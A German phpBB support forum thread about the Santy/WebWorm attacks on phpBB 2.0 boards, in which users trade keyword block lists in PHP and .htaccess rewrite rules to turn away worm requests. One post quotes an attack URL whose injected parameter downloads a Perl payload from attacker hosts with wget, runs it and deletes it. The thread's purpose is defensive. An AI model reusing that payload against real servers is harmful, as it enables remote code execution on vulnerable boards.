WebWorm generation 4

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
richx
Mitglied
Beiträge: 14
Registriert: 14.11.2002 18:12
Kontaktdaten:

Beitrag von richx »

von wegen 2.0.11 sei sicher:

http://lists.netsys.com/pipermail/full- ... 30279.html

scheiss script-kiddies
Benutzeravatar
BraveEagle
Mitglied
Beiträge: 1884
Registriert: 16.01.2003 18:05
Wohnort: born 2 be a Paelzer
Kontaktdaten:

Beitrag von BraveEagle »

man man man wir haben momentan täglich 500-600 angriffe des Wurms. Die sind zwar dank 2.0.11 nicht erfolgreich, aber wenn man andauernd so viele "User" auf dem Board hat und alle in der wietopic.php nervt das schon ein bissel :(
Benutzeravatar
neo18tilidie
Mitglied
Beiträge: 56
Registriert: 23.02.2003 13:47
Kontaktdaten:

Beitrag von neo18tilidie »

BraveEagle hat geschrieben:man man man wir haben momentan täglich 500-600 angriffe des Wurms. Die sind zwar dank 2.0.11 nicht erfolgreich, aber wenn man andauernd so viele "User" auf dem Board hat und alle in der wietopic.php nervt das schon ein bissel :(
hier ne Lösung:

z.b. in common.php z.B. folgendes eintragen:

Code: Alles auswählen

if (getenv("QUERY_STRING")) 
    {
      $url_check .= "?".getenv("QUERY_STRING");
    }

if ( substr_count($url_check, "h4ck3rsbr.net")  > 0 
	|| substr_count($url_check, "v10.com")  > 0
	|| substr_count($url_check, "var/tmp")  > 0
	|| substr_count($url_check, "virus.txt")  > 0
	|| substr_count($url_check, "wget")  > 0
	|| substr_count($url_check, "perl")  > 0
	|| substr_count($url_check, ".txt")  > 0
	|| substr_count($url_check, "system")  > 0
   )
   { 
     exit;
   }
die Zeilen || substr_count($url_check, "XXX") > 0 eben durch die verwendeten URL Parameter ersetzen...
Die versuchten Angriffe (Bsp.: http://www.XXX.De/viewtopic.php?t=1329&rush=echo _START_; cd /var/tmp;wget www.h4ck3rsbr.net/Virus.txt;perl Virus.txt;wget locais.v10.com.br/w;perl w;rm -rf w*;rm -rf Virus*; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 usw.) werden dann einfach per exit Befehl "abgewehrt".

nachteil: alle verwendten Begriffe können dann z.b. bei der Suche Funktion nicht mehr verwendet werden, aber das sollte temporär ne Lösung anbieten...
Benutzeravatar
yks
Mitglied
Beiträge: 1291
Registriert: 10.07.2004 02:31

Beitrag von yks »

hallo,

abgesehen von 2.0.11 = muß, die frage, wo in common.php man das einsetzen könnte und ob in jeder version das funktionieren würde ?
klingt irgendwie zu einfach, aber was spricht denn dagegen ?
für alle kleinen versionen wäre es ein besserer schutz als gar keiner.

viele grüße, yks
Benutzeravatar
larsneo
Mitglied
Beiträge: 2622
Registriert: 07.03.2002 15:23
Wohnort: schwäbisch gmünd
Kontaktdaten:

Beitrag von larsneo »

noch einmal:
1) als schutz vor dem santy wurm sollte man bei älteren boards umgehend http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513 anwenden - damit (und nur damit!) ist das zugrundeliegende problem behoben und das board ist vor dem grassierenden santy wurm geschützt. aufgrund einiger anderer sicherheitslücken ist eine aktualisierung auf 2.0.11 nichtsdestotrotz dringend zu empfehlen.
2) als schutz vor dem traffic/ressourcenverbrauch aufgrund von anfragen infizierter server kann man folgende .htaccess verwenden: http://www.phpbb.de/viewtopic.php?p=414585#414585
gruesse aus dem wilden sueden
larsneo
..::[krapohl.net]::..
Benutzeravatar
neo18tilidie
Mitglied
Beiträge: 56
Registriert: 23.02.2003 13:47
Kontaktdaten:

Beitrag von neo18tilidie »

@yks
die stelle (und version) ist eigentlich egal, da die Abfragen unabhängig von anderem Zeugs sind, aber am besten ist natürlich so weit oben wie möglich.

>> klar ist ein update auf die aktuelle Version zu empfehlen, aber sollte eine neue Sicherheitslücke auftreten, kann das obige Script ohne Anpassung bestimmte Angriffe abwehren...

außer es wird die post methode verwendet, d.h. mit forumlaren, da könnte man dann folgendes verwenden:

Code: Alles auswählen

while (list($key, $value) = each($HTTP_POST_VARS))
 {
$value = htmlspecialchars(trim(stripslashes($value)));

if ( substr_count($key, "XXX")  > 0 
{ exit; }

}
aber bisher sind solche scripts ja nich so häufig (??)
Zuletzt geändert von neo18tilidie am 26.12.2004 16:41, insgesamt 2-mal geändert.
Benutzeravatar
CatZe
Mitglied
Beiträge: 514
Registriert: 30.11.2004 11:46
Kontaktdaten:

Beitrag von CatZe »

ins rootverzeichnis des Forums eine .htaccess legen:

Code: Alles auswählen

RewriteEngine On 
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR] 
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR] 
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR] 
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR] 
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b 
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]
GreetZ
Cat
Benutzeravatar
neo18tilidie
Mitglied
Beiträge: 56
Registriert: 23.02.2003 13:47
Kontaktdaten:

Beitrag von neo18tilidie »

welchen effekt / welche wirkung hat das ding dann??
Benutzeravatar
CatZe
Mitglied
Beiträge: 514
Registriert: 30.11.2004 11:46
Kontaktdaten:

Beitrag von CatZe »

das sorgt dafuer, dass Anfragen mit der typischen Signatur des Wurms im Nirvana enden, aber keinen Zugriff aufs Forum bekommen ;)
GreetZ
Cat
Benutzeravatar
Loewenherz
Mitglied
Beiträge: 624
Registriert: 10.02.2003 20:11
Wohnort: Saarlouis
Kontaktdaten:

Beitrag von Loewenherz »

Obige htaccess kann aber auch dazu führen, dass mehr Anfragen im Nirvana landen. Zum Beispiel wenn man alle Foren als gelesen markiert und nach einer Weile die Ansicht aktualisiert...
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“